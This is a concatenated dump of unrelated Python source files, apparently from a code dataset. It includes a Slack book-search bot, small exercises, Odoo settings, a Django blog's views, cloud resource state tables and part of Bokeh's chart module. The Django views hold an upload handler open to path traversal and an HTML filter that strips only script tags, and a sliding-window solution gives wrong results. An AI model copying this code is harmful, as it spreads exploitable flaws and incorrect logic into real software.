1233.3), 0)\n\n def test_getRatio_calculateRatioAgainstLess(self):\n self.assertGreater(getRatio(123.32, 53.23), 1)\n\n def test_getRatio_calculateRatioAgainstGreater(self):\n self.assertLess(getRatio(123.32, 153.23), 1)\n\n def test_getRatio_calculateRatioAgainstGreater(self):\n self.assertEqual(getRatio(1, 1), 1)\n\n\nif __name__ == \"__main__\":\n unittest.main()\n","sub_path":"client_test.py","file_name":"client_test.py","file_ext":"py","file_size_in_byte":2783,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"79420956","text":"import json\nimport os\nimport random\nimport time\nfrom urllib.error import HTTPError\n\nfrom bottlenose import api\nfrom bs4 import BeautifulSoup\nfrom slackbot.bot import listen_to\n\n\ndef error_handler(err):\n ex = err['exception']\n if isinstance(ex, HTTPError) and ex.code == 503:\n time.sleep(random.expovariate(0.1))\n return True\n\n\ndef fetch_book_data(word):\n key = os.environ['AMAZON_KEY']\n secret = os.environ['AMAZON_SECRET']\n tag = os.environ['AMAZON_ASSOCIATE_TAG']\n \n amazon = api.Amazon(key, secret, tag, Region='JP',\n ErrorHandler=error_handler)\n res = amazon.ItemSearch(Keywords=word, SearchIndex='Books',\n ResponseGroup='Medium')\n res = BeautifulSoup(res, 'lxml')\n \n if res.totalresults.text == '0':\n raise RuntimeError('Search resullts could not be found.')\n \n return [{\n 'title': res.title.text,\n 'title_link': res.detailpageurl.text,\n 'text': res.author.text,\n 'image_url': res.largeimage.url.text\n }]\n\n\n@listen_to('^(?:本|ほん|book)[\\s ]+(.*)')\ndef book(message, word):\n try:\n message.send_webapi('', json.dumps(fetch_book_data(word)))\n except RuntimeError:\n message.send('検索結果が見つかりませんでした :sweat_drops:')\n","sub_path":"kotatsu/book.py","file_name":"book.py","file_ext":"py","file_size_in_byte":1310,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"13073574","text":"\"\"\"\n求最大公约数和最小公倍数\n\"\"\"\ndef ged(x,y):\n if x>y:\n (x,y)=(y,x)\n for i in range(x,1,-1):\n if x % i ==0 and y % i == 0:\n return i\n return 1\ndef lcm(x,y):\n return x*y//ged(x,y)\n\nprint(ged(15,27))\nprint(lcm(15,27))\n","sub_path":"day6/function2.py","file_name":"function2.py","file_ext":"py","file_size_in_byte":267,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"341428718","text":"def e(s):\n cs={}\n for c in s:\n if c not in cs:\n cs[c]=1\n else:\n cs[c]+=1\n od=0\n for c in cs:\n if cs[c]%2!=0:\n od+=1\n if od>1:\n return 'no'\n return 'yes'\n\ni=open('problem4.final.txt', 'r')\no=open('grossam2.4.txt', 'w')\ns=i.readline()\nwhile s!='':\n o.write(e(s[:-1]) + '\\n')\n s=i.readline()\no.close()\ni.close()\n","sub_path":"submissions/grossam2.4.py","file_name":"grossam2.4.py","file_ext":"py","file_size_in_byte":410,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"201069701","text":"# course: Object-oriented programming, year 2, semester 1\n# academic year: 201920\n# author: B. Schoen-Phelan\n# date: 08-10-2019\n# purpose: Lab 3\n\n# import sys\n\nclass WordScramble:\n def __init__(self):\n self.user_input = input(\"Please give me a sentence: \")\n # if self.user_input.isdigit():\n # sys.exit(\"We would have needed a word not a number\")\n\n def scramble(self):\n # print what was input\n print(\"The user input was: \", self.user_input)\n\n # first scramble is just one word\n # reverse two indices\n # particularly good to use is to switch the first two\n # and the last two\n # this only makes sense if you have a world that is longer than 3\n # if len(self.user_input) > 3:\n # new_word = self.user_input[0] + self.user_input[2] + self.user_input[1] \\\n # + self.user_input[3:]\n # elif len(self.user_input) <= 3:\n # new_word = self.user_input\n # else: # here we assume this word is just one character long or the space character\n # print(\"try again\")\n # new_word = False\n #\n # print(new_word)\n\n\n # one solution for full sentence\n sentence = self.user_input.strip().split()\n #\n # # Get the word from the sentence\n for index, word in enumerate(sentence):\n # check the length of the word > 3\n if len(word) > 3:\n # swap the indice of 2 and last element\n temp_word = list(word) # we use a list for item assignment, but could also just use another new string variable\n if (',' in temp_word) or ('.' in temp_word):\n temp = temp_word[1]\n temp_word[1] = temp_word[-3]\n temp_word[-3] = temp\n else:\n # split the word in to a list of characters and swap\n # this swap leaves first and last in tact\n temp = temp_word[1]\n temp_word[1] = temp_word[-2]\n temp_word[-2] = temp\n\n # Join the characters together and form the word\n swapped_word = ''.join(temp_word)\n # replace the previous word at that position with the new swapped word\n sentence[index] = swapped_word\n else:\n # Since the length of the word < 3 don't swap the word\n sentence[index] = word\n\n # Join all the words with a space\n the_swap = ' '.join(sentence)\n # Print word\n print(the_swap)\n\nword_scrambler = WordScramble()\nword_scrambler.scramble()\n# print(string.punctuation)\n","sub_path":"Labs/lab_3_solution.py","file_name":"lab_3_solution.py","file_ext":"py","file_size_in_byte":2696,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"240813033","text":"# uncompyle6 version 3.7.4\n# Python bytecode 2.7 (62211)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: /Users/will/projects/moya/moya/command/sub/apps.py\n# Compiled at: 2015-11-29 05:52:18\nfrom __future__ import unicode_literals\nfrom __future__ import print_function\nfrom ...command import SubCommand\nfrom ...wsgi import WSGIApplication\nfrom ...console import Cell\n\nclass Apps(SubCommand):\n \"\"\"List project applications\"\"\"\n help = b'get application information'\n\n def add_arguments(self, parser):\n parser.add_argument(b'-l', b'--location', dest=b'location', default=None, metavar=b'PATH', help=b'location of the Moya server code')\n parser.add_argument(b'-i', b'--ini', dest=b'settings', default=None, metavar=b'SETTINGSPATH', help=b'path to projects settings file')\n return parser\n\n def run(self):\n application = WSGIApplication(self.location, self.get_settings(), disable_autoreload=True, master_settings=self.master_settings)\n archive = application.archive\n table = []\n for name, app in sorted(archive.apps.items()):\n table.append([\n name,\n app.lib.long_name,\n Cell(app.lib.version, bold=True, fg=b'magenta')])\n\n self.console.table(table, [\n b'app', b'lib', b'version'])","sub_path":"pycfiles/moya-0.6.20-py2.py3-none-any/apps.py","file_name":"apps.py","file_ext":"py","file_size_in_byte":1351,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"605010735","text":"import collections\nfrom typing import List\n\nclass Solution:\n def maxSlidingWindow_brute_force(self, nums: List[int], k: int) -> List[int]:\n if not nums:\n return nums\n \n r = []\n for i in range(len(nums) - k + 1):\n r.append(max(nums[i:i+k]))\n\n return r\n\n def maxSlidingWindow(self, nums: List[int], k: int) -> List[int]:\n results = []\n window = collections.deque()\n current_max = float('-inf')\n for i, v in enumerate(nums):\n window.append(v)\n print(v, window)\n if i < k - 1:\n continue\n\n if current_max == float('-inf'):\n current_max = max(window)\n elif v > current_max:\n current_max = v\n\n results.append(current_max)\n\n if current_max == window.popleft():\n current_max = float('-inf')\n\n return results\n\n\nif __name__ == \"__main__\":\n nums = [1, 3, -1, -3, 5, 3, 6, 7]\n k = 3\n result = Solution().maxSlidingWindow(nums, k)\n for r in result:\n print(r)\n","sub_path":"python/239_Sliding_Window_Maximum.py","file_name":"239_Sliding_Window_Maximum.py","file_ext":"py","file_size_in_byte":1099,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"37794021","text":"# -*- coding: utf-8 -*-\n##############################################################################\n#\n# OpenERP, Open Source Business Applications\n# Copyright (C) 2004-2012 OpenERP S.A. ().\n#\n# This program is free software: you can redistribute it and/or modify\n# it under the terms of the GNU Affero General Public License as\n# published by the Free Software Foundation, either version 3 of the\n# License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU Affero General Public License for more details.\n#\n# You should have received a copy of the GNU Affero General Public License\n# along with this program. If not, see .\n#\n##############################################################################\n\nfrom openerp.osv import fields, osv\n\nclass stock_config_settings(osv.osv_memory):\n _inherit = 'stock.config.settings'\n\n _columns = {\n 'source_loc_id':fields.many2one('stock.location', 'Default Source Location'),\n 'destination_loc_id':fields.many2one('stock.location', 'Default Destination Location')\n }\n\n def get_default_source_loc_id(self, cr, uid, fields, context=None):\n user = self.pool.get('res.users').browse(cr, uid, uid, context = context)\n company_obj = self.pool.get('res.company')\n company = company_obj.browse(cr, uid, user.company_id.id)\n if not company.source_loc_id:\n source_loc_id = False\n else:\n source_loc_id = company.source_loc_id.id\n return {'source_loc_id': source_loc_id}\n def get_default_destination_loc_id(self, cr, uid, fields, context=None):\n user = self.pool.get('res.users').browse(cr, uid, uid, context = context)\n company_obj = self.pool.get('res.company')\n company = company_obj.browse(cr, uid, user.company_id.id)\n if not company.destination_loc_id:\n destination_loc_id = False\n else:\n destination_loc_id = company.destination_loc_id.id\n return {'destination_loc_id': destination_loc_id}\n \n def execute(self, cr, uid, ids, context=None):\n res = super(stock_config_settings, self).execute(cr, uid, ids, context=context)\n user = self.pool.get('res.users').browse(cr, uid, uid, context = context)\n company_obj = self.pool.get('res.company')\n company = company_obj.browse(cr, uid, user.company_id.id)\n config = self.browse(cr, uid, ids[0], context)\n if config.source_loc_id:\n company_obj.write(cr, uid, user.company_id.id, {'source_loc_id':config.source_loc_id.id})\n if config.destination_loc_id:\n company_obj.write(cr, uid, user.company_id.id, {'destination_loc_id':config.destination_loc_id.id})\n return res\n# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:\n","sub_path":"tko_stock_location_default/res_config.py","file_name":"res_config.py","file_ext":"py","file_size_in_byte":3033,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"5132433","text":"from django.shortcuts import render, redirect, HttpResponse\nimport json\nimport random\n# Create your views here.\nfrom django.db.models import Count, Avg, Max\nfrom django.contrib import auth\nfrom app01.models import ArticleUpDown, Comment\nfrom app01 import models\nfrom django.http import JsonResponse\nfrom django.db.models import F\nfrom django.db import transaction\nfrom app01.models import Article, UserInfo, Category, Tag, Article2Tag\n\n\ndef login(request):\n if request.method == \"POST\":\n user = request.POST.get(\"user\")\n pwd = request.POST.get(\"pwd\")\n code = request.POST.get('code')\n if code.upper() != request.session['random_code'].upper():\n return render(request, 'login.html', {'msg': \"验证码错误\"})\n user = auth.authenticate(username=user, password=pwd)\n if user:\n auth.login(request, user)\n return redirect(\"/index/\")\n return render(request, \"login.html\")\n\n\ndef index(request):\n article_list = Article.objects.all()\n return render(request, \"index.html\", {\"article_list\": article_list})\n\n\ndef logout(request):\n auth.logout(request)\n\n return redirect(\"/index/\")\n\n\ndef homesite(request, username, **kwargs):\n \"\"\"\n 查询\n :param request:\n :param username:\n :return:\n \"\"\"\n\n # print(\"kwargs\", kwargs)\n\n # 查询当前站点的用户对象\n user = UserInfo.objects.filter(username=username).first()\n if not user:\n return render(request, \"not_found.html\")\n # 查询当前站点对象\n blog = user.blog\n\n # 查询当前用户发布的所有文章\n if not kwargs:\n article_list = Article.objects.filter(user__username=username)\n\n else:\n condition = kwargs.get(\"condition\")\n params = kwargs.get(\"params\")\n\n if condition == \"category\":\n article_list = Article.objects.filter(user__username=username).filter(category__title=params)\n elif condition == \"tag\":\n article_list = Article.objects.filter(user__username=username).filter(tags__title=params)\n else:\n year, month = params.split(\"/\")\n article_list = Article.objects.filter(user__username=username).filter(create_time__year=year,\n create_time__month=month)\n\n if not article_list:\n return render(request, \"not_found.html\")\n\n # # 查询当前站点每一个分类的名称以及对应的文章数\n #\n # cate_list=Category.objects.filter(blog=blog).annotate(c=Count(\"article__title\")).values_list(\"title\", \"c\")\n # print(cate_list)\n #\n # # 查询当前站点每一个标签的名称以及对应的文章数\n #\n # tag_list=Tag.objects.filter(blog=blog).annotate(c=Count(\"article__title\")).values_list(\"title\", \"c\")\n #\n # # 日期归档\n #\n # date_list=Article.objects.filter(user=user).extra(select={\"y_m_date\":\"strftime('%%Y/%%m',create_time)\"}).values(\"y_m_date\").annotate(c=Count(\"title\")).values_list(\"y_m_date\",\"c\")\n # print(date_list)\n\n return render(request, \"homesite.html\", locals())\n\n\ndef article_detail(request, username, article_id):\n user = UserInfo.objects.filter(username=username).first()\n # 查询当前站点对象\n blog = user.blog\n\n article_obj = Article.objects.filter(pk=article_id).first()\n # 显示出当前文章所有的评论\n comment_list = Comment.objects.filter(article_id=article_id)\n\n return render(request, 'article_detail.html', locals())\n\n\ndef digg(request):\n # print(request.POST)\n is_up = json.loads(request.POST.get('is_up'))\n article_id = request.POST.get('article_id')\n user_id = request.user.pk\n response = {'state': True, 'msg': None}\n obj = ArticleUpDown.objects.filter(user_id=user_id, article_id=article_id).first()\n if obj:\n response['state'] = False\n response['handled'] = obj.is_up\n else:\n with transaction.atomic():\n new_obj = ArticleUpDown.objects.create(user_id=user_id, article_id=article_id, is_up=is_up)\n if is_up:\n Article.objects.filter(pk=article_id).update(up_count=F('up_count') + 1)\n else:\n Article.objects.filter(pk=article_id).update(down_count=F('down_count') + 1)\n return JsonResponse(response)\n\n\ndef comment(request):\n # 获取数据\n user_id = request.user.pk\n article_id = request.POST.get(\"article_id\")\n content = request.POST.get(\"content\")\n pid = request.POST.get(\"pid\")\n # 将获取到的数据进行整合,并且生成评论对象\n\n with transaction.atomic():\n comment = Comment.objects.create(user_id=user_id, article_id=article_id, content=content, parent_comment_id=pid)\n Article.objects.filter(pk=article_id).update(comment_count=F(\"comment_count\") + 1)\n\n response = {\"state\": True}\n response[\"timer\"] = comment.create_time.strftime(\"%Y-%m-%d %X\")\n response[\"content\"] = comment.content\n response[\"user\"] = request.user.username\n\n return JsonResponse(response)\n\n\ndef backend(request):\n user = request.user\n article_list = Article.objects.filter(user=user)\n return render(request, \"backend/backend.html\", locals())\n\n\ndef add_article(request):\n if request.method == \"POST\":\n\n title = request.POST.get(\"title\")\n content = request.POST.get(\"content\")\n user = request.user\n cate_pk = request.POST.get(\"cate\")\n tags_pk_list = request.POST.getlist(\"tags\")\n\n from bs4 import BeautifulSoup\n soup = BeautifulSoup(content, \"html.parser\")\n # 对文章进行过滤:\n for tag in soup.find_all():\n # print(tag.name)\n if tag.name in [\"script\", ]:\n tag.decompose()\n\n # 切片文章文本\n desc = soup.text[0:150]\n\n article_obj = Article.objects.create(title=title, content=str(soup), user=user, category_id=cate_pk, desc=desc)\n\n for tag_pk in tags_pk_list:\n Article2Tag.objects.create(article_id=article_obj.pk, tag_id=tag_pk)\n\n return redirect(\"/backend/\")\n\n\n else:\n\n blog = request.user.blog\n cate_list = Category.objects.filter(blog=blog)\n tags = Tag.objects.filter(blog=blog)\n return render(request, \"backend/add_article.html\", locals())\n\n\nfrom cnblog import settings\nimport os.path\n\n\ndef upload(request):\n # print(request.FILES)\n obj = request.FILES.get(\"upload_img\")\n name = obj.name\n path = os.path.join(settings.BASE_DIR, \"static\", \"upload\", name)\n with open(path, \"wb\") as f:\n for line in obj:\n f.write(line)\n\n import json\n\n res = {\n \"error\": 0,\n \"url\": \"/static/upload/\" + name\n }\n\n return HttpResponse(json.dumps(res))\n\n\ndef delete(request, nid):\n # Article.objects.filter(nid=nid).delete()\n return HttpResponse(str(nid))\n\n\ndef edit_article(request, nid):\n # if request.method=='POST':\n article_obj = Article.objects.filter(nid=nid).first()\n tag_list = Article2Tag.objects.filter(article_id=nid).values_list('tag_id')\n tag_list_id = []\n for i in tag_list:\n tag_list_id.append(i[0])\n print(tag_list_id)\n blog = request.user.blog\n cate_list = Category.objects.filter(blog=blog)\n tags = Tag.objects.filter(blog=blog)\n print('tags', tags)\n cate_id = cate_list.filter(blog=blog, article__pk=nid).values_list('pk').first()[0]\n # print('cate_id', cate_id)\n return render(request, 'backend/edit_article.html/', locals())\n\n\nfrom utils.code import check_code\n\n\ndef code(request):\n img, random_code = check_code()\n request.session['random_code'] = random_code\n from io import BytesIO\n stream = BytesIO()\n img.save(stream, 'png')\n return HttpResponse(stream.getvalue())\n","sub_path":"cnblog/app01/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":7743,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"144312972","text":"# -*- coding: utf-8 -*-\n# COPYRIGHT (C) 2018-2019 GIG TECHNOLOGY NV\n# ALL RIGHTS RESERVED.\n#\n# ALTHOUGH YOU MAY BE ABLE TO READ THE CONTENT OF THIS FILE, THIS FILE\n# CONTAINS CONFIDENTIAL INFORMATION OF GIG TECHNOLOGY NV. YOU ARE NOT ALLOWED\n# TO MODIFY, REPRODUCE, DISCLOSE, PUBLISH OR DISTRIBUTE ITS CONTENT,\n# EMBED IT IN OTHER SOFTWARE, OR CREATE DERIVATIVE WORKS, UNLESS PRIOR\n# WRITTEN PERMISSION IS OBTAINED FROM GIG TECHNOLOGY NV.\n#\n# THE COPYRIGHT NOTICE ABOVE DOES NOT EVIDENCE ANY ACTUAL OR INTENDED\n# PUBLICATION OF SUCH SOURCE CODE.\n#\n# @@license_version:1.8@@\n\n\nclass Machine(object):\n \"\"\"\n Define possible machine model status\n \"\"\"\n\n VIRTUAL = \"VIRTUAL\"\n HALTED = \"HALTED\"\n RUNNING = \"RUNNING\"\n PAUSED = \"PAUSED\"\n DELETED = \"DELETED\"\n DESTROYED = \"DESTROYED\"\n ERROR = \"ERROR\"\n\n DEPLOYING = \"DEPLOYING\"\n STOPPING = \"STOPPING\"\n RESTORING = \"RESTORING\"\n STARTING = \"STARTING\"\n PAUSING = \"PAUSING\"\n RESUMING = \"RESUMING\"\n REBOOTING = \"REBOOTING\"\n RESETTING = \"RESETTING\"\n DELETING = \"DELETING\"\n DESTROYING = \"DESTROYING\"\n ADDING_DISK = \"ADDING_DISK\"\n ATTACHING_DISK = \"ATTACHING_DISK\"\n DETACHING_DISK = \"DETACHING_DISK\"\n DELETING_DISK = \"DELETING_DISK\"\n CHANGING_DISK_LIMITS = \"CHANGING_DISK_LIMITS\"\n CLONING = \"CLONING\"\n RESIZING = \"RESIZING\"\n CREATING_TEMPLATE = \"CREATING_TEMPLATE\"\n\n INVALID_STATES = [DESTROYED, DELETED, ERROR, DESTROYING]\n NON_CONSUMING_STATES = [DESTROYED, DELETED, ERROR, HALTED]\n VALID_STATES = [PAUSED, HALTED, RUNNING]\n UP_STATES = [RUNNING, PAUSED]\n STATIC_STATES = [VIRTUAL, HALTED, RUNNING, PAUSED, DELETED, DESTROYED]\n TRANSITION_STATES = [\n DEPLOYING,\n STOPPING,\n STARTING,\n REBOOTING,\n RESETTING,\n PAUSING,\n RESUMING,\n DELETING,\n RESTORING,\n DESTROYING,\n ADDING_DISK,\n ATTACHING_DISK,\n DETACHING_DISK,\n CLONING,\n RESIZING,\n CREATING_TEMPLATE,\n CHANGING_DISK_LIMITS,\n DELETING_DISK,\n ]\n\n ALLOWED_TRANSITIONS = {\n VIRTUAL: [DEPLOYING, DESTROYING],\n RUNNING: [\n PAUSING,\n STOPPING,\n DELETING,\n RESETTING,\n REBOOTING,\n ADDING_DISK,\n DELETING_DISK,\n ATTACHING_DISK,\n DETACHING_DISK,\n DESTROYING,\n RESIZING,\n CHANGING_DISK_LIMITS,\n ],\n PAUSED: [\n RESUMING,\n STOPPING,\n DELETING,\n RESETTING,\n REBOOTING,\n ADDING_DISK,\n DELETING_DISK,\n ATTACHING_DISK,\n DETACHING_DISK,\n DESTROYING,\n RESIZING,\n CHANGING_DISK_LIMITS,\n ],\n HALTED: [\n STARTING,\n DELETING,\n DESTROYING,\n ADDING_DISK,\n ATTACHING_DISK,\n DETACHING_DISK,\n DESTROYING,\n CLONING,\n RESIZING,\n REBOOTING,\n RESETTING,\n DELETING_DISK,\n CREATING_TEMPLATE,\n CHANGING_DISK_LIMITS,\n ],\n DELETED: [RESTORING, DESTROYING],\n DESTROYED: [],\n }\n\n\nclass Cloudspace(object):\n # static states\n VIRTUAL = \"VIRTUAL\"\n DEPLOYED = \"DEPLOYED\"\n DESTROYED = \"DESTROYED\"\n DELETED = \"DELETED\"\n PAUSED = \"PAUSED\"\n ERROR = \"ERROR\"\n DISABLED = \"DISABLED\"\n\n # transition states\n DEPLOYING = \"DEPLOYING\"\n DISABLING = \"DISABLING\"\n ENABLING = \"ENABLING\"\n DELETING = \"DELETING\"\n DESTROYING = \"DESTROYING\"\n RESTORING = \"RESTORING\"\n PAUSING = \"PAUSING\"\n RESUMING = \"RESUMING\"\n RESETTING = \"RESETTING\"\n UPDATING = \"UPDATING\"\n\n TRANSITION_STATES = [\n DEPLOYING,\n DISABLING,\n ENABLING,\n DELETING,\n DESTROYING,\n RESTORING,\n PAUSING,\n RESUMING,\n RESETTING,\n UPDATING,\n ]\n STATIC_STATES = [VIRTUAL, DEPLOYED, DESTROYED, DELETED, DISABLED, PAUSED]\n VALID_STATES = [DEPLOYED, PAUSED]\n INVALID_STATES = [DESTROYED, DESTROYING, DELETED, DISABLED]\n ALLOWED_TRANSITIONS = {\n VIRTUAL: [DEPLOYING, DELETING, DESTROYING],\n DEPLOYED: [\n DISABLING,\n DELETING,\n DESTROYING,\n PAUSING,\n RESETTING,\n RESUMING,\n UPDATING,\n ],\n PAUSED: [\n RESUMING,\n RESETTING,\n ENABLING,\n DISABLING,\n DELETING,\n DESTROYING,\n UPDATING,\n ],\n DELETED: [DESTROYING, RESTORING],\n DISABLED: [ENABLING, DELETING, DESTROYING],\n DESTROYED: [],\n }\n\n\nclass Account(object):\n DESTROYED = \"DESTROYED\"\n CONFIRMED = \"CONFIRMED\"\n DISABLED = \"DISABLED\"\n DELETED = \"DELETED\"\n\n DESTROYING = \"DESTROYING\"\n DISABLING = \"DISABLING\"\n ENABLING = \"ENABLING\"\n DELETING = \"DELETING\"\n RESTORING = \"RESTORING\"\n DESTROYING = \"DESTROYING\"\n\n INVALID_STATES = [DESTROYED, DESTROYING, DELETED]\n TRANSITION_STATES = [RESTORING, DELETING, DESTROYING, DISABLING, ENABLING]\n STATIC_STATES = [CONFIRMED, DELETED, DISABLED, DESTROYED]\n ALLOWED_TRANSITIONS = {\n CONFIRMED: [DISABLING, DELETING, DESTROYING],\n DISABLED: [ENABLING, DELETING, DESTROYING],\n DELETED: [RESTORING, DESTROYING],\n DESTROYED: [],\n }\n\n\nclass Disk(object):\n MODELED = \"MODELED\"\n ASSIGNED = \"ASSIGNED\"\n CREATING = \"CREATING\"\n CREATED = \"CREATED\"\n DESTROYED = \"DESTROYED\"\n\n # attached disk in recycle bin deleted together with VM\n DELETED = \"DELETED\"\n # detached disk in recycle bin\n TOBEDELETED = \"TOBEDELETED\"\n\n CREATING = \"CREATING\"\n ASSIGNING = \"ASSIGNING\"\n DELETING_ATTACHED_DISK = \"DELETING_ATTACHED_DISK\"\n DESTROYING = \"DESTROYING\"\n DELETING_DETACHED_DISK = \"DELETING_DETACHED_DISK\"\n DESTROYING = \"DESTROYING\"\n RESTORING_ATTACHED_DISK = \"RESTORING_ATTACHED_DISK\"\n RESTORING_DETACHED_DISK = \"RESTORING_DETACHED_DISK\"\n\n DETACHING = \"DETACHING\"\n ATTACHING = \"ATTACHING\"\n RESIZING = \"RESIZING\"\n # the disk goes into this state when we call delete with permanently flag\n TOBEDESTROYED = \"TOBEDESTROYED\"\n VALID_STATES = [ASSIGNED, CREATED]\n INVALID_STATES = [TOBEDESTROYED, DESTROYED, TOBEDELETED, DELETED]\n DESTROYED_STATES = [DESTROYED, TOBEDESTROYED]\n TRANSITION_STATES = [\n CREATING,\n RESIZING,\n ATTACHING,\n DETACHING,\n DELETING_DETACHED_DISK,\n DESTROYING,\n DELETING_ATTACHED_DISK,\n RESTORING_DETACHED_DISK,\n RESTORING_ATTACHED_DISK,\n ]\n STATIC_STATES = [\n MODELED,\n CREATED,\n ASSIGNED,\n TOBEDELETED,\n TOBEDESTROYED,\n DELETED,\n DESTROYED,\n ]\n\n ALLOWED_TRANSITIONS = {\n MODELED: [CREATING, ASSIGNING],\n CREATED: [\n DELETING_DETACHED_DISK,\n DESTROYING,\n ATTACHING,\n RESIZING,\n TOBEDELETED,\n TOBEDESTROYED,\n ],\n ASSIGNED: [DELETING_ATTACHED_DISK, DESTROYING, DETACHING, RESIZING],\n DELETED: [DESTROYING, RESTORING_ATTACHED_DISK],\n TOBEDELETED: [DESTROYING, RESTORING_DETACHED_DISK, TOBEDESTROYED],\n DESTROYED: [],\n DETACHING: [CREATED],\n CREATING: [CREATED],\n ASSIGNING: [ASSIGNED],\n DELETING_DETACHED_DISK: [TOBEDELETED],\n DELETING_ATTACHED_DISK: [DELETED],\n DESTROYING: [DESTROYED],\n RESTORING_ATTACHED_DISK: [ASSIGNED],\n RESTORING_DETACHED_DISK: [CREATED],\n }\n\n\nclass Image(object):\n MODELED = \"MODELED\"\n CREATED = \"CREATED\"\n DELETED = \"DELETED\"\n DESTROYED = \"DESTROYED\"\n TOBEDESTROYED = \"TOBEDESTROYED\"\n DISABLED = \"DISABLED\"\n ERROR = \"ERROR\"\n\n CREATING = \"CREATING\"\n DELETING = \"DELETING\"\n DESTROYING = \"DESTROYING\"\n\n INVALID_STATES = [DESTROYED, DELETED]\n TRANSITION_STATES = [CREATING, DELETING, DESTROYING]\n STATIC_STATES = [MODELED, CREATED, DELETED, DISABLED, DESTROYED, TOBEDESTROYED]\n ALLOWED_TRANSITIONS = {\n MODELED: [CREATING, DESTROYING],\n CREATED: [DELETED, DISABLED, TOBEDESTROYED],\n DISABLED: [CREATED, DELETING, DESTROYING],\n DELETED: [CREATED, TOBEDESTROYED],\n DESTROYED: [],\n }\n\n\nclass Node(object):\n ENABLED = \"ENABLED\"\n MAINTENANCE = \"MAINTENANCE\"\n DECOMMISSIONED = \"DECOMMISSIONED\"\n ERROR = \"ERROR\"\n\n DEACTIVATING = \"DEACTIVATING\"\n ENABLING = \"ENABLING\"\n DECOMMISSIONING = \"DECOMMISSIONING\"\n UPDATING = \"UPDATING\"\n\n TRANSITION_STATES = [DEACTIVATING, ENABLING, DECOMMISSIONING, UPDATING]\n ALLOWED_TRANSITIONS = {\n ENABLED: [DEACTIVATING, DECOMMISSIONING, UPDATING],\n MAINTENANCE: [ENABLING, DECOMMISSIONING],\n DECOMMISSIONED: [],\n ERROR: [ENABLING, DEACTIVATING],\n }\n\n\nclass Stack(Node):\n pass\n","sub_path":"debug-ovc-transition-states/resourcestatus.py","file_name":"resourcestatus.py","file_ext":"py","file_size_in_byte":8937,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"88996589","text":"\"\"\"This is the Bokeh charts interface. It gives you a high level API to build\ncomplex plot is a simple way.\n\nThis is the main Chart class which is able to build several plots using the low\nlevel Bokeh API. It setups all the plot characteristics and lets you plot\ndifferent chart types, taking OrderedDict as the main input. It also supports\nthe generation of several outputs (file, server, notebook).\n\"\"\"\n#-----------------------------------------------------------------------------\n# Copyright (c) 2012 - 2014, Continuum Analytics, Inc. All rights reserved.\n#\n# Powered by the Bokeh Development Team.\n#\n# The full license is in the file LICENCE.txt, distributed with this software.\n#-----------------------------------------------------------------------------\n\n#-----------------------------------------------------------------------------\n# Imports\n#-----------------------------------------------------------------------------\n\nimport itertools\nfrom collections import OrderedDict\n\nimport numpy as np\n\nfrom ..glyphs import (Asterisk, Circle, CircleCross, CircleX, Cross, Diamond,\n DiamondCross, InvertedTriangle, Line, Rect, Segment,\n Square, SquareCross, SquareX, Triangle, Xmarker, Quad)\nfrom ..objects import (CategoricalAxis, DatetimeAxis, Grid, Legend,\n LinearAxis, PanTool, Plot, PreviewSaveTool, ResetTool,\n WheelZoomTool)\n\nfrom ..document import Document\nfrom ..session import Session\nfrom ..embed import file_html\nfrom ..resources import INLINE\nfrom ..browserlib import view\nfrom ..utils import publish_display_data\n\n#-----------------------------------------------------------------------------\n# Classes and functions\n#-----------------------------------------------------------------------------\n\n\nclass Chart(object):\n \"\"\"This is the main Chart class, the core of the ``Bokeh.charts`` interface.\n\n This class essentially set up a \"universal\" Plot object containing all the\n needed attributes and methods to draw any of the Charts that you can build\n subclassing the ChartObject class.\n \"\"\"\n def __init__(self, title, xlabel, ylabel, legend, xscale, yscale, width, height,\n tools, filename, server, notebook):\n \"\"\"Common arguments to be used by all the inherited classes.\n\n Args:\n title (str): the title of your plot.\n xlabel (str): the x-axis label of your plot.\n ylabel (str): the y-axis label of your plot.\n legend (str): the legend of your plot. The legend content is\n inferred from incoming input.It can be ``top_left``,\n ``top_right``, ``bottom_left``, ``bottom_right``.\n It is ``top_right`` is you set it as True.\n xscale (str): the x-axis type scale of your plot. It can be\n ``linear``, ``datetime`` or ``categorical``.\n yscale (str): the y-axis type scale of your plot. It can be\n ``linear``, ``datetime`` or ``categorical``.\n width (int): the width of your plot in pixels.\n height (int): the height of you plot in pixels.\n tools (bool): to enable or disable the tools in your plot.\n filename (str or bool): the name of the file where your plot.\n will be written. If you pass True to this argument, it will use\n ``untitled`` as a filename.\n server (str or bool): the name of your plot in the server.\n If you pass True to this argument, it will use ``untitled``\n as the name in the server.\n notebook (bool): if you want to output (or not) your plot into the\n IPython notebook.\n\n Attributes:\n plot (obj): main Plot object.\n categorical (bool): tag to prevent adding a wheelzoom to a\n categorical plot.\n glyphs (list): to keep track of the glyphs added to the plot.\n \"\"\"\n self.title = title\n self.xlabel = xlabel\n self.ylabel = ylabel\n self.legend = legend\n self.xscale = xscale\n self.yscale = yscale\n self.plot_width = width\n self.plot_height = height\n self.tools = tools\n self.filename = filename\n self.server = server\n self.notebook = notebook\n self._xdr = None\n self._ydr = None\n self.plot = Plot(title=self.title,\n x_range=self._xdr,\n 